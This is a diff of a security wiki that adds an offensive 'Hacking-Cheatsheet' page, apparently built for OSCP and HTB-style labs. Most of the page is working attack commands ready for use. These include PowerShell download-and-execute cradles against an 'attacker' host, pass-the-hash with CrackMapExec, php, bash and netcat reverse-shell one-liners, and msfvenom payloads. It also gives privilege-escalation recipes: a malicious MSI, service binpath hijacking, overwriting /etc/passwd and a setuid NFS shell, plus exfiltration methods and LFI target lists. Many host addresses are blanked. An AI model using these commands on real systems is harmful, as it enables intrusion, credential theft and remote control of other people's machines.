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    16 16   * [Offensive virtual machine's](overview/resourses/
    17 17   * [cybersecurity YouTube channels](overview/resourses/
    18 18   * [All DAMN vulnerable resources](overview/resourses/
     19 + * [Hacking Resources](overview/resourses/
    19 20  * [👣 OSINT](
     21 +* [Google Dorks](overview/
    20 22   
    21 23  ***
    22 24   
    skipped 35 lines
    58 60  ## ⚒ Tools
    59 61   
    60 62  * [Axion-Scan](tools/
     63 +* [Shodan Pentesting Guide](tools/
    61 64   
    62 65  ***
    63 66   
    64  -* [Page 1](page-1/
    65  - * [Bug Bounty Cheatsheet](page-1/
    66  - * [Bug-Bounty Checklist](page-1/
     67 +* [👻 Cheat-sheet's](cheat-sheets/
     68 + * [Bug-Bounty Cheatsheet](cheat-sheets/
     69 + * [Linux-Cheatsheet](cheat-sheets/
     70 + * [Windows-Cheatsheet](cheat-sheets/
     71 + * [Hacking-Cheatsheet](cheat-sheets/
    67 72   
  • ■ ■ ■ ■ ■ ■
     1 +# 👻 Cheat-sheet's
     2 + 
     3 + 
  • ■ ■ ■ ■
    page-1/ cheat-sheets/
    1  -# Bug-Bounty Checklist
     1 +# Bug-Bounty Cheatsheet
    2 2   
    3 3  #### Random DNS Pic <a href="#random-dns-pic" id="random-dns-pic"></a>
    4 4   
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  • ■ ■ ■ ■ ■ ■
     1 +# Hacking-Cheatsheet
     2 + 
     3 +### Hacking Cheatsheet <a href="#hacking-cheatsheet" id="hacking-cheatsheet"></a>
     4 + 
     5 +### General enumeration <a href="#general-enumeration" id="general-enumeration"></a>
     6 + 
     7 +#### Network discovery <a href="#network-discovery" id="network-discovery"></a>
     8 + 
     9 +**Nmap**
     10 + 
     11 +I tend to run 3 nmaps, an initial one, a full one and an UDP one, all of them in parallel:
     12 + 
     13 +```
     14 +nmap -sV -O --top-ports 50 --open -oA nmap/initial <ip or cidr>
     15 +nmap -sC -sV -O --open -p- -oA nmap/full <ip or cidr>
     16 +nmap -sU -p- -oA nmap/udp <ip or cidr>
     17 + 
     18 +--top-ports only scan the N most common ports
     19 +--open only show open ports
     20 +-sC use the default scripts
     21 +-sV detect versions
     22 +-O detect Operating Systems
     23 +-p- scan all the ports
     24 +-oA save the output in normal format, grepable and xml
     25 +-sU scan UDP ports
     26 +```
     27 + 
     28 +Is also possible to specify scripts or ports:
     29 + 
     30 +```
     31 +nmap --scripts vuln,safe,discovery -p 443,80 <ip or cidr>
     32 +```
     33 + 
     34 +If there are servers that could be not answering (ping), then add the flag -Pn (example of initial one):
     35 + 
     36 +```
     37 +nmap -Pn --top-ports 50 --open -oA nmap/initial <ip or cidr>
     38 +```
     39 + 
     40 +#### Ports discovery (without nmap) <a href="#ports-discovery-without-nmap" id="ports-discovery-without-nmap"></a>
     41 + 
     42 +**nc + bash**
     43 + 
     44 +If you get in a machine that doesn’t have nmap installed, you can do a basic discovery of (for example), top 10 ports open in 192.168.30 by doing:
     45 + 
     46 +```
     47 +top10=(20 21 22 23 25 80 110 139 443 445 3389); for i in "${top10[@]}"; do nc -w 1 $i && echo "Port $i is open" || echo "Port $i is closed or filtered"; done
     48 +```
     49 + 
     50 +**/dev/tcp/ip/port or /dev/udp/ip/port**
     51 + 
     52 +Alternatively, is possible to do the same than above but by using the special dev files `/dev/tcp/ip/port` or `/dev/udp/ip/port` (for example nc is not found):
     53 + 
     54 +```
     55 +top10=(20 21 22 23 25 80 110 139 443 445 3389); for i in "${top10[@]}"; do (echo > /dev/tcp/"$i") > /dev/null 2>&1 && echo "Port $i is open" || echo "Port $i is closed"; done
     56 +```
     57 + 
     58 +Taking these last examples, is straightforward to create a dummy script for scan a hole /24 net (for example):
     59 + 
     60 +```
     61 +#!/bin/bash
     62 +subnet="192.168.30"
     63 +top10=(20 21 22 23 25 80 110 139 443 445 3389)
     64 +for host in {1..255}; do
     65 + for port in "${top10[@]}"; do
     66 + (echo > /dev/tcp/"${subnet}.${host}/${port}") > /dev/null 2>&1 && echo "Host ${subnet}.${host} has ${port} open" || echo "Host ${subnet}.${host} has ${port} closed"
     67 + done
     68 +done
     69 +```
     70 + 
     71 +#### Powershell <a href="#powershell" id="powershell"></a>
     72 + 
     73 +**By using Invoke-PortScan (PowerSploit)**
     74 + 
     75 +```
     76 +$topports="50";$target=",,,,";$attacker="";IEX(New-Object Net.Webclient).downloadString("http://$attacker/4msibyp455.ps1");IEX(New-Object Net.Webclient).downloadString("http://$attacker/Invoke-Portscan.ps1");Invoke-Portscan -Hosts "$target" -TopPorts "$topports"
     77 +```
     78 + 
     79 +**Leverage Native Powershell**
     80 + 
     81 +```
     82 +$target = '';$scanPorts = @('80', '8080', '443', '8081', '3128', '25', '5985', '5986', '445', '139'); foreach($port in $scanPorts){Test-NetConnection -ComputerName $target -InformationLevel "Quiet" -Port $port}
     83 +```
     84 + 
     85 +If nmap didn’t grab banners (or is not installed), you can do it with `/dev/tcp/ip/port` `/dev/udp/ip/port` or by using telnet.
     86 + 
     87 +**/dev/tcp/ip/port or /dev/udp/ip/port**
     88 + 
     89 +```
     90 +cat < /dev/tcp/
     91 +SSH-2.0-OpenSSH_6.2p2 Debian-6
     92 +^C pressed here
     93 +```
     94 + 
     95 +For doing it with udp ports is the same, but changing tcp for udp
     96 + 
     97 +**telnet**
     98 + 
     99 +```
     100 +telnet 22
     101 +SSH-2.0-OpenSSH_6.2p2 Debian-6
     102 +^C pressed here
     103 +```
     104 + 
     105 +#### Web directorie/file scanner <a href="#web-directoriefile-scanner" id="web-directoriefile-scanner"></a>
     106 + 
     107 +**Gobuster**
     108 + 
     109 +Scan all the directories/files by extension:
     110 + 
     111 +```
     112 +gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,py -o webscan/gobuster-extensions
     113 +```
     114 + 
     115 +For scanning without extensions, just take out the -x
     116 + 
     117 +**Nikto**
     118 + 
     119 +Sometimes Nikto shows juicy information, I tend to run it like:
     120 + 
     121 +```
     122 +nikto -Format txt -o webscan/nikto-initial -host -p 8080
     123 +```
     124 + 
     125 +**fuff**
     126 + 
     127 +Web fuzzer, [you can get fuff here](, it basically bruteforces the dirs.
     128 + 
     129 +```
     130 +ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u
     131 +```
     132 + 
     133 +#### Most usefull dictionaries (OSCP/HTB) <a href="#most-usefull-dictionaries-oscphtb" id="most-usefull-dictionaries-oscphtb"></a>
     134 + 
     135 +```
     136 +/usr/share/wordlists/rockyou.txt
     137 +/usr/share/wordlists/wfuzz/others/common_pass.txt
     138 + 
     139 +In seclists-pkg:
     140 + 
     141 +/usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt
     142 +/usr/share/seclists/Passwords/Leaked-Databases/alleged-gmail-passwords.txt
     143 +/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
     144 +```
     145 + 
     146 +#### Trusted Folders (Windows) <a href="#trusted-folders-windows" id="trusted-folders-windows"></a>
     147 + 
     148 +```
     149 +accesschk.exe "ceso" C:\ -wus
     150 + -> -w is to locate writable directories
     151 + -> -u supress errors
     152 + -> -s makes recursion on all subdirectories
     153 + 
     154 +icacls.exe C:\Windows\Tasks
     155 + ^-- Verify if Tasks has execution permissions for example (flag is "RX")
     156 +```
     157 + 
     158 +#### Samba <a href="#samba" id="samba"></a>
     159 + 
     160 +**smbclient**
     161 + 
     162 +Check if there is anonymous login enabled:
     163 + 
     164 +```
     165 +smbclient -L
     166 +```
     167 + 
     168 +**impacket**
     169 + 
     170 +Is also possible to use impacket in the same way than smbclient to check for anonymous login (and a lot more as browse the shares) in case of incompatible versions.
     171 + 
     172 +```
     173 + 
     174 +/usr/share/doc/python3-impacket/examples/ ""@
     175 +```
     176 + 
     177 +**smbmap**
     178 + 
     179 +Check which permissions we have in those shares (if there are):
     180 + 
     181 +```
     182 +smbmap -H
     183 +Or having an user:
     184 +smbmap -u ceso -H
     185 +```
     186 + 
     187 +#### Login through CIFS/WinRM/PSSession <a href="#login-through-cifswinrmpssession" id="login-through-cifswinrmpssession"></a>
     188 + 
     189 +When injecting a ticket and impersonating a user, we can swap `CIFS` for `HTTP` for getting a shell via WinRM or swap `CIFS` for `HOST` for getting a shell via PsExec!!!
     190 + 
     191 +**CrackMapExec - WinRM**
     192 + 
     193 +With Hash
     194 + 
     195 +```
     196 +crackmapexec winrm -u administrator -H 09238831b1af5edab93c773f56409d96 -x "ipconfig"
     197 +```
     198 + 
     199 +With Password (Example gets a reverse shell)
     200 + 
     201 +```
     203 +```
     204 + 
     205 +**CrackMapExec - SMB**
     206 + 
     207 +With Hash
     208 + 
     209 +```
     210 +crackmapexec smb -u gouda -H 09238831b1af5edab93c773f56409d96 -x "powershell.exe IEX(New-Object Net.Webclient).downloadString('');IEX(New-Object Net.Webclient).downloadString('')"
     211 +```
     212 + 
     213 +With Hash + Domain
     214 + 
     215 +```
     216 +crackmapexec smb -d -u cuartirolo -H 09238831b1af5edab93c773f56409d96 -x "whoami"
     217 +```
     218 + 
     219 +With password
     220 + 
     221 +```
     222 +smb -u administrator -p fn89hudi1892r -x "powershell.exe IEX(New-Object Net.Webclient).downloadString('')"
     223 +```
     224 + 
     225 +**Version (nmap didn’t detect it)**
     226 + 
     227 +Sometimes nmap doesn’t show the version of Samba in the remote host, if this happens, a good way to know which version the remote host is running, is to capture traffic with wireshark against the remote host on 445/139 and in parallel run an smbclient -L, do a follow tcp stream and with this we might see which version the server is running.
     228 + 
     229 +![](
     230 + 
     231 +### Exfiltration <a href="#exfiltration" id="exfiltration"></a>
     232 + 
     233 +#### Samba <a href="#samba-1" id="samba-1"></a>
     234 + 
     235 +Generate a samba server with Impacket:
     236 + 
     237 +```
     238 +impacket-smbserver tools /home/kali/tools
     239 +```
     240 + 
     241 +**Mount in Windows**
     242 + 
     243 +Mounting it in Windows with Powershell:
     244 + 
     245 +```
     246 +New-PSDrive -Name "tools" -PSProvider "Filesystem" -Root "\\\tools"
     247 +```
     248 + 
     249 +Mounting it without Powershell:
     250 + 
     251 +```
     252 +net use z: \\\tools"
     253 +```
     254 + 
     255 +On windows, to list mounted shares, either Powershell or without it:
     256 + 
     257 +```
     258 +Powershell: Get-SMBShare
     259 +Without Powershell: net share
     260 +```
     261 + 
     262 +**Mount in Linux**
     263 + 
     264 +Is needed to have installed cifs-utils, to install it (in debian based):
     265 + 
     266 +```
     267 +sudo apt-get install cifs-utils
     268 +```
     269 + 
     270 +To mount it:
     271 + 
     272 +```
     273 +sudo mount -t cifs // ~/my_share/
     274 +```
     275 + 
     276 +To list mounted shares:
     277 + 
     278 +```
     279 +mount | grep cifs
     280 +grep cifs /proc/mount
     281 +```
     282 + 
     283 +#### HTTP <a href="#http" id="http"></a>
     284 + 
     285 +From your local attacker machine, create a http server with:
     286 + 
     287 +```
     288 +sudo python3 -m http.server 80
     289 +sudo python2 -m SimpleHTTPServer 80
     290 +```
     291 + 
     292 +It’s also possible to specify which path to share, for example:
     293 + 
     294 +```
     295 +sudo python3 -m http.server 80 --dir /home/kali/tools
     296 +```
     297 + 
     298 +**Windows**
     299 + 
     300 +```
     301 +iex(new-object net.webclient).downloadstring("
     302 +IWR -Uri "" -Outfile "n64.exe"
     303 +certutil.exe -urlcache -split -f "" nc.exe
     304 +wmic process get brief /format:"
     305 +bitsadmin /Transfer myDownload C:\Windows\Temp\evilfile.txt
     306 +```
     307 + 
     308 +**Linux**
     309 + 
     310 +```
     311 +curl --output evil.php
     312 +```
     313 + 
     314 +#### FTP <a href="#ftp" id="ftp"></a>
     315 + 
     316 +If there is an ftp server which we have access, we can upload files there through it, the "" is the same for both, windows or linux:
     317 + 
     318 +```
     319 +Connect and login with:
     320 + 
     321 +ftp
     322 + 
     323 +Upload the files with:
     324 + 
     325 +put
     326 + 
     327 +Sometimes is needed to enter in passive mode before doing anything, if is the case, just type:
     328 + 
     329 +pass
     330 + 
     331 +followed by enter
     332 +```
     333 + 
     334 +#### Sockets <a href="#sockets" id="sockets"></a>
     335 + 
     336 +Using nc/ncat is possible to create as a listener to upload/download stuff through them, the syntax for nc and ncat is basically the same. Create the socket with:
     337 + 
     338 +```
     339 +Attacker:
     340 + nc -lvnp 443 < evil.php
     341 + 
     342 +For both cases from windows, the only difference is to write nc.exe
     343 + 
     344 +Victim:
     345 + nc -v 443 > evil.php
     346 +```
     347 + 
     348 +#### RDP <a href="#rdp" id="rdp"></a>
     349 + 
     350 +If we have access to a windows machine with a valid user/credentials and this user is in the “Remote Desktop Users”, we can share a local directorie as a mount volume through rdp itself once we connect to the machine:
     351 + 
     352 +**Linux**
     353 + 
     354 +**Mounting volume**
     355 + 
     356 +```
     357 +rdesktop -g 1600x800 -r disk:tmp=/usr/share/windows-binaries -u pelota -p -
     358 +```
     359 + 
     360 +**Forcing enable of clipboard**
     361 + 
     362 +I might want to force the use of the clipboard if it’s not being taken by default and use the 100% of the screen:
     363 + 
     364 +```
     365 +rdesktop -d arkham -u ceso -p pirata -g 100% -x 0x80 -5 -K -r clipboard:CLIPBOARD
     366 +```
     367 + 
     368 +**Connection with restricted admin mode**
     369 + 
     370 +```
     371 +xfreerdp en Linux soporta restricted admin mode, se ejecuta asi por ej: `xfreerdp /u:admin /pth:<NTLM-hash-of-user-admin-pass> /v: /cert-ignore
     372 +```
     373 + 
     374 +**Windows**
     375 + 
     376 +**Restricted admin mode**
     377 + 
     378 +```
     379 +Enable it :
     380 + Through registry:
     381 + HKLM:\System\CurrentControlSet\Control\Lsa
     382 + Use "DisableRestrictedAdmin" property
     383 + With Powershell:
     384 + New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
     385 + 
     386 +Connect it:
     387 + --> mstsc.exe /restrictedadmin
     388 +```
     389 + 
     390 +**Stacked commands without GUI**
     391 + 
     392 +```
     393 +sharprdp.exe computername=appsrv01 command="powershell (New-Object System.Net.WebClient).DownloadFil
     394 +e('', 'C:\Windows\Tasks\met.exe'); C:\Windows\Tasks\met.exe" username=example\ceso password=soyUnaPassword
     395 +```
     396 + 
     397 +### Pivoting <a href="#pivoting" id="pivoting"></a>
     398 + 
     399 +It’s possible to do pivoting by using proxychains, pure nc’s or in case of linux just some fifo files (I will write them down this another methods down maybe in a future), I have used during all the OSCP an awesome tool called (sshuttle)\[] (it’s a transparent proxy server that works like “a vpn”, and doesn’t require with super rights, only thing needed is that the bastion server you will use, needs to have installed python) and sometimes some SSH Forwarding. Something worth to mention nmap doesn’t work through sshuttle.
     400 + 
     401 +#### sshuttle <a href="#sshuttle" id="sshuttle"></a>
     402 + 
     403 +**One hop**
     404 + 
     405 +Let’s say we are in an intranet and we have compromised a firewall that gives us access to the management net (fw.example.mgmt - ips and as the management ip), by using sshuttle we can create a “vpn” to talk directly to those servers, for that, we use:
     406 + 
     407 +```
     408 +sshuttle [email protected]
     409 +```
     410 + 
     411 +**Multi-hops**
     412 + 
     413 +Now imagine that after we broke up into the management net after some some enumeration, we ended to compromise a machine that has also access to a production environment (foreman.example.mgmt - ips and, we can take advantage of sshuttle + ProxyCommand of ssh to create a “vpn” through this multiple hops, so…putting it down, this will be kind of as follow (the diagram is extremly simplified and just for the sake of illustrate this visually, so it doesn’t intend to provide a 100% precise network diagram):
     414 + 
     415 +![](
     416 + 
     417 +To have that working, is needed to put the next conf in your ssh conf file (normally \~/.ssh/config. It’s based on the example above, but is easy to extrapolate to different scenarios):
     418 + 
     419 +```
     420 +Host fw.example.mgmt
     421 + Hostname
     422 + User userOnFw
     423 + IdentityFile ~/.ssh/priv_key_fw
     424 +Host foreman.example.mgmt
     425 + Hostname
     426 + User root
     427 + ProxyJump fw.example.mgmt
     428 + IdentityFile ~/.ssh/priv_key_internal
     429 +```
     430 + 
     431 +And now to setup the “multiple hop vpn”, run:
     432 + 
     433 +```
     434 +sshuttle -r foreman.example.mgmt -v &
     435 + 
     436 +Later on is possible to connect from the local machine:
     437 +ssh [email protected]
     438 +```
     439 + 
     440 +#### Chisel with remote port forward from machine in the net <a href="#chisel-with-remote-port-forward-from-machine-in-the-net" id="chisel-with-remote-port-forward-from-machine-in-the-net"></a>
     441 + 
     442 +On attacker machine I start up a chisel reverse server on port 9050 (imagine this machine IP is
     443 + 
     444 +On compromised machine in the network I start a client connection against the server running in the attacker. The command below will be forwarding the traffic from port 8081 in the machine throughout the compromised machine (via localhost in port 5050) to the attacker.
     445 + 
     446 +```
     447 +./chisel client R:
     448 +```
     449 + 
     450 +#### Metasploit: autoroute + socks\_proxy <a href="#metasploit-autoroute--socks_proxy" id="metasploit-autoroute--socks_proxy"></a>
     451 + 
     452 +```
     453 +use post/multi/manage/autoroute
     454 +set session 8
     455 +run
     456 +use auxiliary/server/socks_proxy
     457 +run -j
     458 +```
     459 + 
     460 +The SRVPORT of socks\_proxy must match the one configured in proxychains.conf as the VERSION used as well.
     461 + 
     462 +### Reverse shells <a href="#reverse-shells" id="reverse-shells"></a>
     463 + 
     464 +#### php <a href="#php" id="php"></a>
     465 + 
     466 +```
     467 +<?php $sock = fsockopen("","443"); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
     468 +```
     469 + 
     470 +```
     471 +php -r '$sock=fsockopen("",443);exec("/bin/sh -i <&3 >&3 2>&3");'
     472 +```
     473 + 
     474 +#### bash <a href="#bash" id="bash"></a>
     475 + 
     476 +```
     477 +bash -i >& /dev/tcp/ 0>&1
     478 +```
     479 + 
     480 +#### sh + nc <a href="#sh--nc" id="sh--nc"></a>
     481 + 
     482 +```
     483 +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 443 >/tmp/f
     484 +```
     485 + 
     486 +#### Perl (example deploy as cgi-bin) <a href="#perl-example-deploy-as-cgi-bin" id="perl-example-deploy-as-cgi-bin"></a>
     487 + 
     488 +```
     489 +msfvenom -p cmd/unix/reverse_perl LHOST="" LPORT=443 -f raw -o reverse_shell.cgi
     490 +```
     491 + 
     492 +#### Java (example to deploy on tomcat) <a href="#java-example-to-deploy-on-tomcat" id="java-example-to-deploy-on-tomcat"></a>
     493 + 
     494 +```
     495 +msfvenom -p java/shell_reverse_tcp LHOST= LPORT=443 -f war rev_shell.war
     496 +```
     497 + 
     498 +#### Windows HTTP download reverse shell <a href="#windows-http-download-reverse-shell" id="windows-http-download-reverse-shell"></a>
     499 + 
     500 +```
     501 +msfvenom -a x86 --platform windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('')\"" -e x86/unicode_mixed BufferRegister=EAX -f python
     502 +```
     503 + 
     504 +```
     505 +msfvenom -p windows/x64/meterpreter/reverse_https lhost= lport=443 -f csharp
     506 +```
     507 + 
     508 +We can also use it with the following parameters for migration
     509 + 
     510 +```
     511 +msfvenom -a x64 -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 EnableStageEncoding=True PrependMigrate=True -f csharp
     512 +```
     513 + 
     514 +Or either, in the `msfconsole` add the parameter `AutoRunScript`, the following will try to migrate our reverse too explorer.exe:
     515 + 
     516 +```
     517 +set AutoRunScript post/windows/manage/migrate name=explorer.exe spawn=false
     518 +```
     519 + 
     520 +#### Windows staged reverse TCP <a href="#windows-staged-reverse-tcp" id="windows-staged-reverse-tcp"></a>
     521 + 
     522 +```
     523 + msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o reverse.exe
     524 +```
     525 + 
     526 +#### Windows stageless reverse TCP <a href="#windows-stageless-reverse-tcp" id="windows-stageless-reverse-tcp"></a>
     527 + 
     528 +```
     529 +msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST= LPORT=443 -f exe -o <output_name.format>
     530 +```
     531 + 
     532 +#### Linux staged reverse TCP <a href="#linux-staged-reverse-tcp" id="linux-staged-reverse-tcp"></a>
     533 + 
     534 +```
     535 +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -f elf -o <outout_name>.elf
     536 +```
     537 + 
     538 +#### Linux staged reverse TCP <a href="#linux-staged-reverse-tcp-1" id="linux-staged-reverse-tcp-1"></a>
     539 + 
     540 +```
     541 +msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=443 -f elf -o <outout_name>.elf
     542 +```
     543 + 
     544 +### Privilege escalation <a href="#privilege-escalation" id="privilege-escalation"></a>
     545 + 
     546 +#### Windows <a href="#windows-2" id="windows-2"></a>
     547 + 
     548 +**Always Install Elevated**
     549 + 
     550 +If we have enabled a privilege which allow us to ALWAYS install with elevated privileges, we can craft a .msi leveranging wixtools, specifically with candl.exe and light.exe. The steps are as follows:
     551 + 
     552 +1 - Create a malicious .xml wix file:
     553 + 
     554 +```
     555 +<?xml version="1.0"?>
     556 +<Wix xmlns="">
     557 + <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
     558 + <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
     559 + <Media Id="1" Cabinet="" EmbedCab="yes"/>
     560 + <Directory Id="TARGETDIR" Name="SourceDir">
     561 + <Directory Id="ProgramFilesFolder">
     562 + <Directory Id="INSTALLLOCATION" Name="Example">
     563 + <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
     564 + </Component>
     565 + </Directory>
     566 + </Directory>
     567 + </Directory>
     568 + <Feature Id="DefaultFeature" Level="1">
     569 + <ComponentRef Id="ApplicationFiles"/>
     570 + </Feature>
     572 + <InstallExecuteSequence>
     573 + <Custom Action="SystemShell" After="InstallInitialize"></Custom>
     574 + </InstallExecuteSequence>
     575 + </Product>
     576 +</Wix>
     577 +```
     578 + 
     579 +The powershell in b64 executed is this one:
     580 + 
     581 +```
     582 +IEX(New-Object Net.Webclient).downloadString('http://attacker/nieri.ps1');IEX(New-Object Net.Webclient).downloadString('http://attacker/run-shellcode-64bit.ps1')
     583 +```
     584 + 
     585 +2 - Create a malicious .wix (this step and next one MUST be run from the path where the wix tools are located)
     586 + 
     587 +```
     588 +candle.exe ..\bad-wix-pe.xml -out ..\reverse.wix
     589 +```
     590 + 
     591 +3 - Create the malicious .msi from the .wix
     592 + 
     593 +```
     594 +light.exe ..\reverse.wix -out ..\vamosvamos.msi
     595 +```
     596 + 
     597 +**Run-As**
     598 + 
     599 +```
     600 +PS C:\> $secstr = New-Object -TypeName System.Security.SecureString
     601 +PS C:\> $username = "<domain>\<user>"
     602 +PS C:\> $password = '<password>'
     603 +PS C:\> $secstr = New-Object -TypeName System.Security.SecureString
     604 +PS C:\> $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
     605 +PS C:\> $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr
     606 +PS C:\> Invoke-Command -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://<ip/host>:<port>/path/to/file.evil') } -Credential $cred -Computer localhost
     607 +-----------------------------------------------------------------------------------------------------
     608 +Invoke-Command -ComputerName localhost -Creadential $credential -ScriptBlock { C:\inetpub\wwwroot\internal-01\log\nc.exe 1338 -e cmd.exe }
     609 +```
     610 + 
     611 +**Incorrect permisions in services (sc config binpath)**
     612 + 
     613 +Binpath is set as running `cmd.exe` passing a commad to execute to it (so once the process dies, the one executed by it so the command to `cmd.exe` remains):
     614 + 
     615 +```
     616 +sc config upnphost binpath= "C:\WINDOWS\System32\cmd.exe /k C:\inetpub\wwwroot\nc.exe -nv 443 -e C:\WINDOWS\System32\cmd.exe"
     617 +```
     618 + 
     619 +**SAM + SYSTEM + Security**
     620 + 
     621 +If those 3 files are in your hands (you could download to your attacker machine), you can dump hashes and crack them:
     622 + 
     623 +```
     624 +/usr/share/doc/python3-impacket/examples/ -sam SAM.bak -security SECURITY.bak -system SYSTEM.bak LOCAL
     625 + 
     626 +sudo john dumped_hashes --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
     627 +```
     628 + 
     629 +#### Linux <a href="#linux-2" id="linux-2"></a>
     630 + 
     631 +**/home/user/openssl =ep (empty capabilities)**
     632 + 
     633 +Make 2 copies of passwd, one as backup of the original, and one that will be used as custom:
     634 + 
     635 +```
     636 +cp /etc/passwd /tmp/passwd.orig
     637 +cp /etc/passwd /tmp/passwd.custom
     638 +```
     639 + 
     640 +Now, a custom user will be created and added to `/tmp/passwd.custom` with `customPassword` and as root user (UID = GID = 0):
     641 + 
     642 +```
     643 +echo 'ceso:'"$( openssl passwd -6 -salt xyz customPassword )"':0:0::/tmp:/bin/bash' >> /tmp/passwd.custom
     644 +```
     645 + 
     646 +Now, create a custom `key.pem` and `cert.pem` with openssl:
     647 + 
     648 +```
     649 +openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
     650 +```
     651 + 
     652 +Encrypt the new custom passwd:
     653 + 
     654 +```
     655 +openssl smime -encrypt -aes256 -in /tmp/passwd.custom -binary -outform DER -out /tmp/passwd.enc /tmp/cert.pem
     656 +```
     657 + 
     658 +Now, decrypt the custom passwd overwritting in the process the real one (`/etc/passwd`):
     659 + 
     660 +```
     661 +cd /
     662 +/home/ldapuser1/openssl smime -decrypt -in /tmp/passwd.enc -inform DER -inkey /tmp/key.pem -out /etc/passwd
     663 +```
     664 + 
     665 +And finally, just login with the user created with root privileges by using `customPassword`:
     666 + 
     667 +**Command web injection: add user**
     668 + 
     669 +```
     670 +/usr/sbin/useradd c350 -u 4242 -g root -m -d /home/c350 -s /bin/bash -p $(echo pelota123 | /usr/bin/openssl passwd -1 -stdin) ; sed 's/:4242:0:/:0:0:/' /etc/passwd -i
     671 +```
     672 + 
     673 +**NFS; no\_root\_squash,insecure,rw**
     674 + 
     675 +If `/etc/exports` has a line like:
     676 + 
     677 +```
     678 +/srv/pelota,rw)
     679 +/srv/pelota,insecure,rw)
     680 +```
     681 + 
     682 +NFS is being exported and you and you have ssh access to the machine. From your attacker machine **while logged as root** user run:
     683 + 
     684 +```
     685 +ssh -f -N [email protected] -L 2049:
     686 +mount -t nfs my_share
     687 +cd my_share
     688 +cat > shell.c<<EOF
     689 +#include <unistd.h>
     690 +int main(){
     691 + setuid(0);
     692 + setgid(0);
     693 + system("/bin/bash");
     694 +}
     695 +EOF
     696 +gcc shell.c -o shell
     697 +chmod u+s shell
     698 +```
     699 + 
     700 +Now from inside a SSH session on the victim machine (in this example ``):
     701 + 
     702 +```
     703 +bash-4.2$ cd /srv/pelota
     704 +bash-4.2$ ./shell
     705 +bash-4.2# id
     706 +uid=0(root) gid=0(root) groups=0(root),1000(megumin) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
     707 +```
     708 + 
     709 +### Good to know (either Windows and/or Linux) <a href="#good-to-know-either-windows-andor-linux" id="good-to-know-either-windows-andor-linux"></a>
     710 + 
     711 +#### Arch cross compile exploit (and diff glibc version) <a href="#arch-cross-compile-exploit-and-diff-glibc-version" id="arch-cross-compile-exploit-and-diff-glibc-version"></a>
     712 + 
     713 +```
     714 +gcc -m32 -Wall -Wl,--hash-style=both -o gimme.o gimme.c
     715 +```
     716 + 
     717 +#### IP restriction at application level, bypass <a href="#ip-restriction-at-application-level-bypass" id="ip-restriction-at-application-level-bypass"></a>
     718 + 
     719 +Try to send a request modifying the HTTP header by adding:
     720 + 
     721 +```
     722 +X-Forwarder-For: <ip allowed>
     723 +```
     724 + 
     725 +#### Windows - check OS information <a href="#windows---check-os-information" id="windows---check-os-information"></a>
     726 + 
     727 +#### Windows - check architecture <a href="#windows---check-architecture" id="windows---check-architecture"></a>
     728 + 
     729 +```
     730 +wmic os get osarchitecture
     732 +```
     733 + 
     734 +#### Powershell running as 32 or 64 bits <a href="#powershell--running-as-32-or-64-bits" id="powershell--running-as-32-or-64-bits"></a>
     735 + 
     736 +```
     737 +[Environment]::Is64BitProcess
     738 +```
     739 + 
     740 +#### Linux LFI - intesresting files to look after <a href="#linux-lfi---intesresting-files-to-look-after" id="linux-lfi---intesresting-files-to-look-after"></a>
     741 + 
     742 +```
     743 +/proc/self/status
     744 +/proc/self/environ
     745 +/etc/passwd
     746 +/etc/hosts
     747 +/etc/exports
     748 +```
     749 + 
     750 +#### Windows LFI - intesresting files to look after <a href="#windows-lfi---intesresting-files-to-look-after" id="windows-lfi---intesresting-files-to-look-after"></a>
     751 + 
     752 +```
     753 +C:/Users/Administrator/NTUser.dat
     754 +C:/Documents and Settings/Administrator/NTUser.dat
     755 +C:/apache/logs/access.log
     756 +C:/apache/logs/error.log
     757 +C:/apache/php/php.ini
     758 +C:/boot.ini
     759 +C:/inetpub/wwwroot/global.asa
     760 +C:/MySQL/data/hostname.err
     761 +C:/MySQL/data/mysql.err
     762 +C:/MySQL/data/mysql.log
     763 +C:/MySQL/my.cnf
     764 +C:/MySQL/my.ini
     765 +C:/php4/php.ini
     766 +C:/php5/php.ini
     767 +C:/php/php.ini
     768 +C:/Program Files/Apache Group/Apache2/conf/httpd.conf
     769 +C:/Program Files/Apache Group/Apache/conf/httpd.conf
     770 +C:/Program Files/Apache Group/Apache/logs/access.log
     771 +C:/Program Files/Apache Group/Apache/logs/error.log
     772 +C:/Program Files/FileZilla Server/FileZilla Server.xml
     773 +C:/Program Files/MySQL/data/hostname.err
     774 +C:/Program Files/MySQL/data/mysql-bin.log
     775 +C:/Program Files/MySQL/data/mysql.err
     776 +C:/Program Files/MySQL/data/mysql.log
     777 +C:/Program Files/MySQL/my.ini
     778 +C:/Program Files/MySQL/my.cnf
     779 +C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
     780 +C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
     781 +C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
     782 +C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
